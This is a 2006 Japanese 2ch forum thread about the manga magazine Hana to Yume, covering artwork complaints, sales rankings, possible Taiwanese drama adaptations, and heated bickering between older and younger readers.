117 :花と名無しさん:2006/12/23(土) 21:17:14 ID:???0
河惣益巳とか和田慎二に比べりゃ
スキビしゃにむゴルデンの絵なんてどうってことない…と思う
リアのころは河惣は気持ち悪くて読む気も起きなくて結局読まずじまいだった
和田は読んでみたら意外と面白かったけど

118 :花と名無しさん:2006/12/23(土) 21:20:11 ID:???0
>>113
自分も厨房くらいまでは絵で漫画選んでて
古い絵や今っぽくても好みじゃない絵の漫画は拒否ってたなぁ。

友達のススメられた絵が古い漫画読んでから
絵が古くても面白い漫画は楽しめるって事を知って
それ以来絵は気にしなくなったけど。

もったいないとは思うけど
タゲの内は絵で読まず嫌いしちゃうのも仕方ないかもね。

119 :花と名無しさん:2006/12/23(土) 21:21:37 ID:???0
>>114
自分もトビナの新作見たい。
潔癖はもういいやってかんじ。

120 :花と名無しさん:2006/12/23(土) 21:39:47 ID:???0
>>117
自分が花ゆめ読み始めた時に3人ともいたけど
同じだったなぁ…仲村はマシとは思わなかった。

121 :花と名無しさん:2006/12/23(土) 23:34:34 ID:???O
絵は年齢や既読数関わらずダメな人はダメだと思うよ

122 :花と名無しさん:2006/12/24(日) 01:21:20 ID:???O
フルバのスレとかってないんだね

123 :花と名無しさん:2006/12/24(日) 01:22:35 ID:???0
「とか」いらんだろとマジレス。

124 :花と名無しさん:2006/12/24(日) 02:06:24 ID:???O
高屋奈月スレ自体がないよね

125 :花と名無しさん:2006/12/24(日) 02:10:29 ID:???0
フルバ話もういらネ

126 :花と名無しさん:2006/12/24(日) 03:03:31 ID:???O
昔は結構好きだったのに。
いきなり最終回だったから思わず立ち読みしたら結構良かった

127 :花と名無しさん:2006/12/24(日) 04:09:01 ID:???0
またいつものイタイ形態厨かw


ところで仲村の絵マシになった気がする
前よりはだけど

相変わらず癖は強いけども

128 :花と名無しさん:2006/12/24(日) 04:10:35 ID:???0
高尾の絵は嫌いじゃない。
でも話は嫌い。ホモ!

129 :花と名無しさん:2006/12/24(日) 07:46:26 ID:???O
おたく雑誌だけど
サイトすくねー! 不人気

130 :花と名無しさん:2006/12/24(日) 09:33:45 ID:???0
>>129 初心者さん乙。

131 :花と名無しさん:2006/12/24(日) 11:20:56 ID:???0
スキビの絵は私には無理。キモイ。
笑いがこみあげてきて話に集中できない。
笑いのネタとして見てるけど、キョーコとレンの顔キモすぎ。
もっと年齢層高い雑誌でやればもっと知名度上がるかもしんないのに…。

VBRの絵もイマドキじゃないと思うよ。
りなちゃ系といわれればりなちゃだけど。

132 :花と名無しさん:2006/12/24(日) 11:23:54 ID:???O
さっき「花ざかりの君たちへ」全巻をブ〇クオフに売りに行ったら、
「この作品は在庫過多なので
現在買い取っておりません。
この品物(花キモ)はお持ち帰り下さい」
って言われたよ。
重たいけど持って帰ってきた
明日ゴミの日だから捨てよう…。

133 :花と名無しさん:2006/12/24(日) 11:41:38 ID:???0
ブクオフって売りたい本を
箱詰めにして連絡したら
取りに来てくれるんじゃなかったけ。
そんで売れるやつだけを買ってくれて
買い取り対象にならなかったやつは
処分してくれる。
もう1年以上前だから変わってるかもしれないけど
大量に売りたいときはそのほうがラクかも。

134 :花と名無しさん:2006/12/24(日) 11:53:02 ID:???0
>>133
以前は、買い取れない物でも無料でいいなら引き取って処分するって
店員答えてくれてたけど、今はそうもいかないのかもなー

135 :花と名無しさん:2006/12/24(日) 13:13:53 ID:???0
クリスマスだよ皆…

136 :花と名無しさん:2006/12/24(日) 13:17:16 ID:???0
そういやクリスマスネタなかったね

137 :花と名無しさん:2006/12/24(日) 13:56:43 ID:???0
>>136
つアラクレ

138 :花と名無しさん:2006/12/24(日) 14:19:27 ID:???0
心も体も財布も寒い自分には
関係のない行事だ。

139 :花と名無しさん:2006/12/24(日) 15:27:46 ID:???O
>>135
だからなにか?
クリスマスに2ちゃんで漫画を語っちゃいけない法律でもあるの?
男がいない事がそんなに恥ずかしいことですか?
つか何様ですか?
男なんて下等な生き物、こちらから願い下げという考えで生きてますが何か?

140 :花と名無しさん:2006/12/24(日) 15:46:02 ID:???0
>>139
( ´Д⊂

141 :花と名無しさん:2006/12/24(日) 16:09:11 ID:???0
>>139
どこを縦読みすればよろしいのですか?

142 :花と名無しさん:2006/12/24(日) 16:13:58 ID:???0
全米が泣いた

143 :花と名無しさん:2006/12/24(日) 16:33:42 ID:???0
>>139 (ノД`)

144 :花と名無しさん:2006/12/24(日) 16:36:47 ID:???0
二次元に恋しちゃうの☆まで読んだ

145 :花と名無しさん:2006/12/24(日) 16:50:57 ID:???0
>>139
涙で全部読めない

146 :花と名無しさん:2006/12/24(日) 17:38:34 ID:???0
街のイルミネーションをもう見なくて済むかと思うと嬉しいね!
綺麗で大好きだけどさ、一人で歩く時の切なさったらもう…

147 :花と名無しさん:2006/12/24(日) 17:57:25 ID:???O
>>135
八つ当たりスマソ…
両親を看取ったら孤独死する覚悟も決めたし。
別に良いんです。

148 :花と名無しさん:2006/12/24(日) 18:09:33 ID:???0
ハァイ☆俺っち27歳のイケメンNEET!
君達そんなに寂しいならボクと花ゆめについて語ろーYO!

149 :花と名無しさん:2006/12/24(日) 18:11:06 ID:???O
まぁ自分の好きなようにしなよ。てかここ自分語り板じゃないし・・

150 :花と名無しさん:2006/12/24(日) 20:19:37 ID:???0
NGのギャグが寒い





151 :花と名無しさん:2006/12/25(月) 11:55:09 ID:???O
昨日の夜からレスついてなさすぎワロタw



152 :花と名無しさん:2006/12/25(月) 12:34:43 ID:???O
あえて突っ込んじゃだめだよそれ
気使おうよ

153 :花と名無しさん:2006/12/25(月) 13:04:40 ID:???0
今号は過疎で話題も寒い


154 :花と名無しさん:2006/12/25(月) 18:17:45 ID:???O
クリスマスにここにいるのは抵抗あるのかもね…なんか究極だし。

155 :花と名無しさん:2006/12/25(月) 18:58:22 ID:???0
というか、別に話すことがないというか…
クリスマスだからとか気にしたことはない

156 :花と名無しさん:2006/12/25(月) 21:27:41 ID:???0
それじゃ2007年の花ゆめ大予想でもしてみようか。

・幸福が編集の大プッシュのおかげでアニメ化→しかしキャベツ・MUSASHI並の出来に。
ある意味原作通りなのでスレがプチ祭り状態。
・スキビ重大発表は台湾でのドラマ化→さほど売り上げも伸びずがっかり。
・高屋の新連載がフルバ後期を引きずりイマイチ盛り上がらず。
・夏に闇末の別冊がつくがどうでもいい外伝でファンがぶち切れる。
・ピザがコミケに出没。バキのマリアみたいになってる。
・いつの間にか定価が300円に。

157 :花と名無しさん:2006/12/25(月) 21:37:13 ID:???0
大阪屋
1位 V・B・ローズ 8 日高 万里 白泉社
6位 学園アリス 12 樋口 橘 白泉社
8位 Wジュリエット2 1 絵夢羅 白泉社
30位 ゴールデン・デイズ 4 高尾 滋 白泉社

太洋社 調査期間:2006/12/18 - 2006/12/24
総合
少女 4 白泉社 V・B・ローズ 8 日高 万里 410 4-592-18168-9 2006/12/18
少女
1 白泉社 V・B・ローズ 8 日高 万里 410 4-592-18168-9 2006/12/18
2 白泉社 学園アリス 12 樋口 橘 410 4-592-18099-2 2006/12/18
3 白泉社 WジュリエットII 1 絵夢羅 410 4-592-18857-8 2006/12/18
5 白泉社 ゴールデン・デイズ 4 高尾 滋 410 4-592-18199-9 2006/12/18
6 白泉社 らせつの花 2 潮見 知佳 410 4-592-18355-X 2006/12/18
9 白泉社 ブラッディKISS 1 古都 和子 410 4-592-18856-X 2006/12/18


158 :花と名無しさん:2006/12/25(月) 21:50:30 ID:???0
>>156
台湾でドラマ化って全然重大発表じゃないじゃんw
何もないも同然

159 :花と名無しさん:2006/12/25(月) 22:07:10 ID:???0
あー台湾ならありそう。
重大発表って別にその程度でも重大発表って煽りそうだし。

日本人受けしない絵だけど台湾ならいけるかもよ?
日本でドラマとかアニメにしても受けないだろうし。

160 :花と名無しさん:2006/12/25(月) 22:08:27 ID:???O
MUSASHI並、か。そりゃホントある意味忠実だな〜w。
ケーブルで見かけてビックリしたもん、アレ。
雑魚の手足が全部一緒に動くよ〜背景が変わらないよ〜口が空いてないのに喋ってるよ〜怖いよ〜。
あのスタッフが作るなら毎週見てもいいな幸福アニメ。

161 :花と名無しさん:2006/12/25(月) 22:12:49 ID:???0
>>159
だって台湾でなんかやられても関係ないじゃん
ちなみにアニメ化したりする漫画って、ウケがいい絵柄ばかりじゃないと思う
いや、アニメ化もドラマ化も自分はやめて欲しいんだけどね

162 :花と名無しさん:2006/12/25(月) 22:44:09 ID:???0
>155
そういうの書いてる人みると可哀想になる。
同情。
スキビなんて見てるからアンタ婚期逃しちゃって・・・。

163 :花と名無しさん:2006/12/25(月) 22:44:18 ID:???O
>>156
そういや、前にテレビで花男ヒットさせた台湾の敏腕女プロデューサーの特集みたいなのやってたんだけど、
彼女が日本のテレビからインタビュー受けてるシーン、後ろの本棚にスキビらしき単行本が映ってた記憶が…
あの時、スキビも台湾ドラマの候補になってるのか?と思った。

164 :花と名無しさん:2006/12/25(月) 22:49:43 ID:???0
>>156
・花キモのドラマ化でトチ狂った編集がピザに花ざかりUを描かせる
→1回載っただけで後はずっと休載

165 :花と名無しさん:2006/12/25(月) 22:58:25 ID:???0
>>163
少しでも日本で人気のありそうな少女漫画は
かたっぱしから読んでみているのでは。

166 :花と名無しさん:2006/12/25(月) 23:11:59 ID:???0
>>162
そういうイヤミっぽいこと書く人って可哀想になる。
よほどつらいことばっかりあるのかと。
そりゃあもう24だけど、別に結婚してないのがおかしいとも思わないし。
遠距離だから会える頻度は少なくても一応彼氏はいるし。
…で、何でスキビ!?単行本も持ってないぞ??

167 :花と名無しさん:2006/12/25(月) 23:16:14 ID:???O
釣り堀ですか?

168 :166:2006/12/25(月) 23:19:06 ID:???0
あかんね
自分で自分にレスしておくか
釣りにマジレスするなんて必死だなっと…

169 :花と名無しさん:2006/12/25(月) 23:22:29 ID:???0
>>166
だからどこを縦読みすれば(ry

170 :花と名無しさん:2006/12/25(月) 23:36:31 ID:???0
24歳にもなってかわいそう、と思う

171 :花と名無しさん:2006/12/25(月) 23:38:31 ID:???0
スレ違いだからどうでもいい、と思う。

172 :花と名無しさん:2006/12/25(月) 23:38:37 ID:???0
>>170
心底同意

173 :花と名無しさん:2006/12/25(月) 23:45:01 ID:???0
>>169-172
スルーできない皆さんも
似たようなものだと思うんだけど

174 :花と名無しさん:2006/12/26(火) 01:09:41 ID:???0
>>173
(´Д`)つ鏡

175 :花と名無しさん:2006/12/26(火) 01:28:04 ID:???0
花君の台湾キャスト見て吹いたよ。
どうみても主人公男じゃん。

176 :修羅場:2006/12/26(火) 01:34:26 ID:???0
スキビ、台湾だったらドラマにしても馴染みそうな気がする。
つーか日本でも、アニメ化よりドラマ化の方が合うと思うな。脚本が上手く調理してくれれば。

177 :花と名無しさん:2006/12/26(火) 01:36:16 ID:???0
名前欄入れたままだったごめん

178 :花と名無しさん:2006/12/26(火) 02:04:13 ID:???O
>>175
台湾版の瑞稀、かわいくないよね。山田花子にそっくりだ…
まあ、男子高に潜入してもバレない設定だし、あのどっからどう見ても
モサい男にしか見えないヒロインは的確なチョイスなのかもしれない…

179 :花と名無しさん:2006/12/26(火) 02:31:07 ID:???0
台湾ドラマならもうそっちでいいよ。見る機会もなさそうだし。
>>176
人気ナンバーワン俳優というキャラを本物の俳優がやると考えただけで無理がある。
配役がダメダメだったら設定だけで失笑もの。


180 :花と名無しさん:2006/12/26(火) 08:31:13 ID:???0
結局話題は花キモとスキビくらいか


181 :花と名無しさん:2006/12/26(火) 08:47:25 ID:???O
スキモ好きなオバンくらいしかクリスマス時期に2ちゃんにいないっしょw
一般じゃアリスやSAのがまだ名前知られてるのに
売り上げ売り上げって、マイナーなのにアリスより売れてるのは
金のあるババアに受けてるからだろw

花キモとかイマドキの中高生はシラネーよ、古いんだよ話題が。

182 :花と名無しさん:2006/12/26(火) 08:53:08 ID:???O
砂糖姫より最悪な連載があっただろうか…

183 :花と名無しさん:2006/12/26(火) 09:21:45 ID:???O
今回の付録はどうですか?感想聞かせて下さい!買うか悩んでいます。。。

184 :花と名無しさん:2006/12/26(火) 09:24:20 ID:???0
>>181
クリスマス前から話題がフルバだったけどねw
結局花ゆめ読者はみんなヲバでしょう
オタ雑誌なんだから仕方ないか

185 :花と名無しさん:2006/12/26(火) 09:25:10 ID:???O
スキビがドラマってのはどう考えてもキツい。
あの話を実写化されたら寒くてしょうがないw

186 :花と名無しさん:2006/12/26(火) 09:27:43 ID:???0
スキビ苦手だがドラマ化されると単行本アリスより売れそう

187 :花と名無しさん:2006/12/26(火) 09:30:00 ID:???0
ドラマになると原作本の大人買いが入るからね



188 :花と名無しさん:2006/12/26(火) 09:36:04 ID:???O
ドラマになってもスキビは見ないなぁ。
ハマれるタイプの漫画じゃないよね、絵のせいで。
最近は話もつまらないらしいし台湾が妥当じゃ?
逆に日本でドラマにして受けなかったら笑いものだし。

189 :花と名無しさん:2006/12/26(火) 09:40:56 ID:???0
花ゆめのマンガってどれも基本が地味だしオシャレじゃないから
何かの原作って難しいよね
台湾版?の花男のではセットがゴージャスで豪邸のグレートが高かったけど
日本版の方がセットが地味だったのが残念だった。。地味

190 :花と名無しさん:2006/12/26(火) 09:43:55 ID:???O
ドラマになったとしても昼ドラとか深夜だろうし
使われる俳優とかもマイナーな人になるだろうね。
それだったらアニメ化の方が良い気がするけど。

191 :花と名無しさん:2006/12/26(火) 09:45:22 ID:???O
台湾とか言ってる人いるけど
花君とスキビじゃ売り上げが天と地の差だし
海賊版もネットにすら出回らないスキビを海外の人が知ってるわけないと思うよ。
あの絵は海外の人にはグロすぎるだろうし…中国系のホラーに多い絵だから。
いくら台湾でもヲタ受けするカワイイ絵じゃないと
日本以上に相手にされない結果で終わるんじゃないかな。

192 :花と名無しさん:2006/12/26(火) 09:48:56 ID:???0
スキモドラマ化に 嫉 妬 (´A`)/

193 :花と名無しさん:2006/12/26(火) 09:50:49 ID:???O
昼ドラか深夜ドラマが妥当だろうなぁ。
夜やるには知名度や力不足感あるし
アニメにするには絵が萌えないからアニヲタにスルーされるし。
衛星系アニメならありそうかも?

どっちかというなら幸福か悩殺でもアニメにして絵を丁寧に描いてもらいたい。
作画が優秀ならヒットしそう。

194 :花と名無しさん:2006/12/26(火) 09:50:49 ID:???0
スキビって花ゆめ本誌の中じゃあんまり売れてないんだね

195 :花と名無しさん:2006/12/26(火) 09:54:29 ID:???0
もともとそんなに売れてるマンガってないんじゃ

196 :花と名無しさん:2006/12/26(火) 09:55:39 ID:???O
>>191
海賊版出てるし人気もある。も少し調べてから言いなよ。

197 :花と名無しさん:2006/12/26(火) 09:58:55 ID:???O
>>196
ムキになるなよスキモヲバw

198 :花と名無しさん:2006/12/26(火) 10:01:18 ID:???0
>>191
>>181くらいからずっと一人携帯でがんばってるんだ
そっと見守ってやろう
クリスマスによほど嫌なことがあったんだよ

199 :花と名無しさん:2006/12/26(火) 10:11:06 ID:???O
花君、台湾ドラマ化してたんだ…知らなかった

200 :花と名無しさん:2006/12/26(火) 10:17:55 ID:???O
191は自分だけどとりあえず他の携帯は違うよ?
この時間はパソコン使えない人多いだろうに携帯書き込みは全部同じ扱い?
スキビ批判は全部一人?
別に間違ったことは言ってないと思うけど?
実際ネットで出回らないじゃない。事実ですよ?
何かスキビ好きなオバサマの気に障ったの?
パソコンだったら自演じゃないの?
そもそもあなたも自演してるからそう見えるのでは?


少なくともスキビはドラマ化されたとして
嫉妬するほどの作品にはならないでしょ?
花ゆめが無駄に落ちぶれていくのは悲しいだけ。
アリスを教訓にすればいいのに。

それにしてもスキビにもヲタっているんだね?
一番スキビが好きなんて人はヲバ以外で存在しないと思ってた。ごめん。

201 :花と名無しさん:2006/12/26(火) 10:22:39 ID:???O
追加。
批判が全部一人にみえるなら
擁護も全部一人の自演に見えるし
その点ではオアイコかもね。

傷付けるつもりでクリスマスに嫌な事とか言ったんだろうけで
自分がそれ言われたら嫌だから?
なんでクリスマスか意味わからなかった。

202 :花と名無しさん:2006/12/26(火) 10:27:32 ID:???O
>>197>>200-201
いやヲタじゃなく自分も驚いたが海外の方が早売りゲットしてる場合もある。
多分日本にいる人がサイトに回してるんだと思うが翻訳も早い。
ttp://www.17kk.net/default.htm
例えばこんなサイトとか。重いから携帯からはみないように。

203 :花と名無しさん:2006/12/26(火) 11:12:04 ID:???0
必死なのが一人いるなwがんばれ

204 :花と名無しさん:2006/12/26(火) 11:15:25 ID:???0
>時間はパソコン使えない
ヲバ決定だな冬休みの存在を知らないのか


205 :花と名無しさん:2006/12/26(火) 11:21:09 ID:???0
>>191 ぐち長すぎ

206 :花と名無しさん:2006/12/26(火) 11:27:48 ID:???0
花ゆめ読者って>>200みたいに自己主張ばっかりのキモいヤツ多いの?

207 :花と名無しさん:2006/12/26(火) 13:17:40 ID:???0
>>200 ウザ過ぎw

>>204 確かに今は冬休みだw 

208 :花と名無しさん:2006/12/26(火) 13:50:07 ID:???0
なんかこのスレみんなキモイな。

スキビなんて糞キモ漫画自体どうでもいいじゃん?
主婦にしか人気ないし。
ドラマとかなってもどうせ深夜でしょ。

今回の花ゆめネタがないな。
フルバが終わったのもあるけどドドーンと話題のある看板がほしい。
個人的にはしゃにむが珍しく続きが気になるから休みなのがツライ。
個人的にしゃにむが気になるところで終わってたから次が待ち遠しい。

209 :花と名無しさん:2006/12/26(火) 13:50:46 ID:???0
まー冬休みじゃなくてもパソコン集団いるけどね。
ネタも古いし。
自分も含めてだけど。

210 :花と名無しさん:2006/12/26(火) 13:53:09 ID:???0
スキビは絵がとにかく嫌い。
周りでもスキビの存在しってる人いない。
でも花ゆめ全部そうだし、目くそ鼻くそを笑うって感じじゃん?

絵がキモくても話がよければそれでよい。
スキビだって昔は面白かったし
SAとかも昔はまだ読めた頃があった。
その分ララに人が流れちゃってる気がする・・・。

211 :花と名無しさん:2006/12/26(火) 13:54:43 ID:???0
しゃにむ、ゴルデン、スキビをまとめて別花に送って
花ゆめは心置きなく厨房化させれば
スレも荒れないのにな。
ヲバンも厨房もどうせキモヲタ仲間なんだから仲良くしなよ。

212 :花と名無しさん:2006/12/26(火) 13:55:30 ID:???0
>>208
しゃにむが好きならあんたもスキビ主婦と同類の年齢層だとry

213 :花と名無しさん:2006/12/26(火) 13:59:56 ID:???0
スキビってマイナーなのに絵だけで嫌われるからねぇ。
アンチ厨がうざくて迷惑。
自分は高尾さんの絵の方がよっぽど古臭いと思うけど。

214 :花と名無しさん:2006/12/26(火) 14:01:19 ID:???0
このスレを見ている人はこんなスレも見ています。(ver 0.20)
【スキビ】仲村佳樹スレ@難民 ACT.9【避難所】 [難民]
仲村佳樹作品SS&妄想スレ6 [漫画サロン]

どうりで今日はエキサイトしてるヲタがいると思ったら。
やはりこのスレに出張してたのか。

215 :花と名無しさん:2006/12/26(火) 14:04:34 ID:???O
花ゆめスレはヲバとタゲの戦いが面白いね
他雑誌でもたまにそういう話題になるけど
漫画読むのに年齢を引き合いに出すのが良くわからない
タゲなら偉いとかヲバだから駄目とかでもあるのか?

216 :花と名無しさん:2006/12/26(火) 14:04:44 ID:???0

なんでアリスは人気はあるみたいなのに
コミックスは売れないんだろう?
ゲームとかアニメはわりと好評みたいだよね?

217 :花と名無しさん:2006/12/26(火) 14:05:55 ID:???0
一応自分タゲ層だと思うけど
ババ臭い漫画もある以上、ヲバさんが読んでてもいいと思う。
幅広い年齢のヲタに受けるならそれでいいんじゃないの?

218 :花と名無しさん:2006/12/26(火) 14:07:34 ID:???0
編集自体がそもそもヲバ切捨てをしてる感じなのが
若い読者に反映されちゃってるのかなー寂しいな。
単に絵が古臭いのは今時の子は嫌うってのもあるだろうけど
とにかく読んでみて、っていいたい。

219 :花と名無しさん:2006/12/26(火) 14:09:26 ID:???0
スキビとかしゃにむとかはタゲの子から見たら吐くほどキモイんだろうけど
こっちに言わせりゃ幸福とかゲハに「モエ〜」とか言ってる様なガキの方が
よっぽどキモ痛いと思います。

仲良くしようよ。

220 :花と名無しさん:2006/12/26(火) 14:10:53 ID:???0
そもそも花ゆめがヲバ寄りかタゲ寄りかハッキリしないのがねぇ。。

221 :花と名無しさん:2006/12/26(火) 14:14:53 ID:???0
>>220
一応今は幸福を推してるらしいしタゲ寄りなんじゃないの?
りなちゃ化はいやだ。

222 :花と名無しさん:2006/12/26(火) 14:17:08 ID:???0
>>200 >>204 スキビ嫌いなヲバもいるみたいだからいいんじゃない?
誰もスキビが面白いとか好きとか言ってないのに興奮してるのなんて
モロ更年期じゃん

223 :花と名無しさん:2006/12/26(火) 14:30:27 ID:???0
タゲより雑誌になるには若手にオシャレ系やセンスの良い人がいない・・・
雑誌自体が流行の絵柄とか全く意識してないよね花ゆめ
たまに買う自分にとっちゃスキモもしゃにむや他タゲマンガも絵柄とかセンスはないと思うよ
ギャグ雑誌として見れば面白いけど恋愛モノはどの作家も無理みたいだし

224 :花と名無しさん:2006/12/26(火) 15:45:02 ID:???O
全部ギャグ漫画として読めば面白いかも?

でもタゲ低くする=クオリティ下げるとは違うのにね。

225 :花と名無しさん:2006/12/26(火) 17:50:30 ID:???O
ヲバも大人しくしてれば存在くらいは許してあげるんだけどねぇ…
いちいち調子乗るから思わずぶっ叩きたくなる。特に高尾儲とジュリ房。
仲村と羅川ヲタは身の程をわきまえてるから、たまに叩くくらいで許してやるけど。
高尾儲とジュリ房は空気を読んでくれと言いたい。
結果的にスレが荒れて住人も迷惑してるし。

226 :花と名無しさん:2006/12/26(火) 18:16:13 ID:???O
今号は30日か31日頃に手に入る人いるのかなー?

227 :花と名無しさん:2006/12/26(火) 18:41:45 ID:???O
ヲバを馬鹿にしてると
自分がヲバになってから泣くよ。
経験談。

228 :花と名無しさん:2006/12/26(火) 19:01:48 ID:???0
>>225が哀れな件

229 :花と名無しさん:2006/12/26(火) 19:11:15 ID:???O
釣られまくるヲバ様と厨房達。

230 :花と名無しさん:2006/12/26(火) 19:12:06 ID:???0
↑更に釣られる人

231 :花と名無しさん:2006/12/26(火) 19:19:51 ID:???0
>>225がどう見ても一番迷惑な件w

232 :花と名無しさん:2006/12/26(火) 19:32:18 ID:???0
>>225
仲村オタも羅川オタも痛いよw
流れ見ればわかると思うけど

233 :花と名無しさん:2006/12/26(火) 19:35:47 ID:???0
>>225には、声出して笑ってしまった
年末に笑いをありがとうw

234 :花と名無しさん:2006/12/26(火) 19:38:33 ID:???O
だからヲバは怖い。この粘着さ。ムキになってるのはそっちもだし!
ヲバなら人の振りみて自分を正すくらい心広くなりなよ。
孤独死とか言う前に彼氏探せばいいじゃん?
八つ当たりするなよー!

235 :花と名無しさん:2006/12/26(火) 19:40:49 ID:???0
>>225おもしれww
因みに自分16歳彼氏もちですよ☆
精神年齢ガキ乙。

236 :花と名無しさん:2006/12/26(火) 19:44:25 ID:???0
昼間っから2ちゃんに書き込んでるような冬休みのガキどもがなんと言おうと今の花ゆめで一番売れてるのはスキビですから!
オマエラはせいぜい悩殺や幸福で爆笑してろよ!



って小2の妹が言ってた。

237 :花と名無しさん:2006/12/26(火) 19:51:35 ID:???O
スキビヲバがまたやらかしたの?
一斉に225にレスがつく分かりやすさ。

スキビって売り上げに見合う人気ないわりに
好きなのはヲバだから粘着よね。

238 :花と名無しさん:2006/12/26(火) 19:55:04 ID:???0
>>225人気が出てよかったな
もうひとりぼっちじゃないよ

239 :花と名無しさん:2006/12/26(火) 19:56:50 ID:???0
また変臭の自演に踊らされてらw

240 :花と名無しさん:2006/12/26(火) 20:00:50 ID:???0
>>225の人気に>>234嫉妬♯

241 :花と名無しさん:2006/12/26(火) 20:54:24 ID:???0
>>235
それ泣くトコロ?

242 :花と名無しさん:2006/12/26(火) 21:05:31 ID:???0
そろそろ本題に戻ろうぜ
花とゆめ↓

243 :花と名無しさん:2006/12/26(火) 21:33:54 ID:???0
終了。

244 :花と名無しさん:2006/12/26(火) 21:35:25 ID:???0
ヲバとタゲ餓鬼を刺激しない漫画なんて牛乳くらいしか思いつかないよ・・・

245 :花と名無しさん:2006/12/26(火) 22:11:09 ID:???O
スキビ実写化するなら松はもこみち

246 :花と名無しさん:2006/12/26(火) 22:14:23 ID:???0
花ゆめなんて、もともとオタ漫画なんだから
オバ相手だろうがなんだろうが、売れればいいのにな

247 :花と名無しさん:2006/12/26(火) 23:07:53 ID:???O
ちなみにヲバって大体いくつぐらいからなんですか?
タゲより上はみんなヲバ?

248 :花と名無しさん:2006/12/26(火) 23:27:51 ID:???0
メロスレ→別花スレ→にあったもの
ttp://www.hakusensha.co.jp/ad/reader/index.html
タゲはともかく結構上まで読んでるようだし、雑誌を支えている、という
意味でこの辺が主要タゲといっていいのでは。

249 :花と名無しさん:2006/12/27(水) 00:38:48 ID:urkZSxqP0
■ おすすめ2ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)
【スキビ】仲村佳樹スレ@難民 ACT.9【避難所】 [難民]
仲村佳樹作品SS&妄想スレ6 [漫画サロン]
少女漫画家達の愚痴スレver.56 [アニメ漫画業界]
●○シクラメン連なる降誕祭館○● [同人]
山田南平スレ!225〜南平マニュアル実践編〜 [難民]
明石家サンタ 車3台目 [ネトゲ実況]
◆スレタテ依頼スレッド★14 [萌えニュース+]
あさっての方向。 〜その12〜 [アニメ]

250 :花と名無しさん:2006/12/27(水) 01:08:59 ID:???O
話豚切りだが、次号は年内に手に入る人いるんだろうか?


251 :花と名無しさん:2006/12/27(水) 04:41:42 ID:???O
数年前に12月22日に入手したツワモノさん、今年はどうでしたかー?
もう花ゆめ読んでないか

252 :花と名無しさん:2006/12/27(水) 05:06:26 ID:???0
ここの人見てると可哀想になるよ。
引きこもってないで他に楽しい事見つけないよ。

253 :花と名無しさん:2006/12/27(水) 05:56:57 ID:???O
楽しいことはいっぱいあるけど、ここの論争見るのも結構楽しんでますよ
あーみんな必死だな、と微笑ましい気分になれますね

254 :花と名無しさん:2006/12/27(水) 06:41:07 ID:???O
しかし何でマンガ雑誌一つにそこまで熱く討論するんだ?
何か「読むのもアラ探しの為」て感じがする。
もう少し気楽に読めばいいのに。

255 :花と名無しさん:2006/12/27(水) 07:29:38 ID:???0
昨日のスレのオバサン何?ああいうのヒステリーって言うんだろうな
OL対ガキ面白い
アンチスキビを公言すればヲバじゃないと思ってるんだろうが
相手がガキだと分かったとたん切れたって感じww


256 :花と名無しさん:2006/12/27(水) 07:58:09 ID:???O
タゲぶってる奴もみんなヲバだったりして。
タゲに言わせれば十代後半の自分もヲバだろうけど
どうせここにいるのはヲバか冬休みに2ちゃん漬けの可哀相なヲタかだよ。
じゃなきゃ花ゆめは読まないし、ましてやここにはいないよ。
年若くてもヲタガキなら大差ないし、むしろ哀れなんだから。

とりあえず昨日の流れみて、ヲバだのヲタだのやめて欲しい。
スキビとしゃにむは思うにヲタというよりも
二番目、三番目に好きで読んでる人が多いと思う。
擁護する=ヲタという図式にうんざりする。
これなら一番好きな漫画はここでネタにしたくないって思ってしまう。

257 :花と名無しさん:2006/12/27(水) 08:02:55 ID:???0
>>225 みたいに他人をたたくことに生きがいを感じる読者もいるんだね
自分が嫌いな作品を他人が好きなのは許せないのだろう

258 :花と名無しさん:2006/12/27(水) 08:23:19 ID:???0
花夢生き残りを考えるなら初期回帰しかない。
年齢層に囚われず多彩な作品を載せていくのが一番。
既に読者が定着してる、りなちゃ層オンリーに絞るのは得策じゃない。

259 :花と名無しさん:2006/12/27(水) 08:51:40 ID:???O
つーか225みたいに
全然好きでもない作品のヲタ扱いする人が一番ムカつく。

260 :花と名無しさん:2006/12/27(水) 09:03:24 ID:???0
>>225
読解力、会話不能なくらい妄想激しいとあんな感じになる
ヲタクの典型だよ、あいつらいつも自分の世界だもんな

261 :花と名無しさん:2006/12/27(水) 09:04:02 ID:???O
印刷だの取次搬入だのの都合を考えると、
昨日あたりには3号の見本誌が出回っているだろう。
関係者に期待。

262 :花と名無しさん:2006/12/27(水) 09:16:38 ID:???O
高尾とか羅川とかあの流れで出る意味が分からないよ。
なんでヲバってだけで許すとか許さないとか…。
少し前は悩殺叩きだったりジュリ叩きアリスだったり…。
ターゲットがコロコロ変わるな。

話変えるけど、個人的に最近悩殺が面白くなってきた。
話のスピードが速くなったからかな。
この勢いのまま終わってくれたら一番いいけど。

263 :花と名無しさん:2006/12/27(水) 10:12:00 ID:???0
冬休みに気付かずガキに遊ばれるヲバ哀れ 
って感じだったがストレスたまってるのかね?
高尾とか羅川や中村が嫌いな自分はヲバじゃないと思って満足してるんだ



264 :花と名無しさん:2006/12/27(水) 11:35:53 ID:???O
オバがヒステリー起こしてて笑えるw

265 :花と名無しさん:2006/12/27(水) 12:40:27 ID:???0
>>225 ヲバがヲバをからかっちゃいかんだろうw
どっちもヲバなのにwww

266 :花と名無しさん:2006/12/27(水) 12:48:08 ID:???0
ほとんどがヲバ
タゲでここにいるのは、ヲタで周りから浮いてる
張り合っても意味ないぞ

267 :花と名無しさん:2006/12/27(水) 12:53:06 ID:???0
両方ウザイからスキビ、ゴルデン、しゃにむ、オデットは別花とかに移動してくれないかな
住み分けできて丁度いいよ
スキビ、ゴルデン、しゃにむが復活したらまたヒス起こす人が出てきそう

268 :花と名無しさん:2006/12/27(水) 13:10:40 ID:???0
しかしそれらがなくなると
他のものに矛先が向かう気がしないでもないな

269 :花と名無しさん:2006/12/27(水) 13:12:39 ID:???0
本誌の内容が薄いと、こんな流れになるのか・・・カナシス


270 :花と名無しさん:2006/12/27(水) 13:36:14 ID:???0
>>256
実際、自分の好きな作品が話題に上らないと安心する。
こーした方がいいのになぁって感じではなくて
女の醜い、足のひっぱり合いw
男の多い板やスレにはない陰険さがココにはある。

271 :花と名無しさん:2006/12/27(水) 13:44:14 ID:???0
実際今号はちょっと物足りないね、読みきり雑誌を読んだような感じ
どれも今回あっさりした内容だったし

272 :花と名無しさん:2006/12/27(水) 16:08:22 ID:???O
>>270
少女漫画板ではちょくちょく目にするが、ここは酷いよね
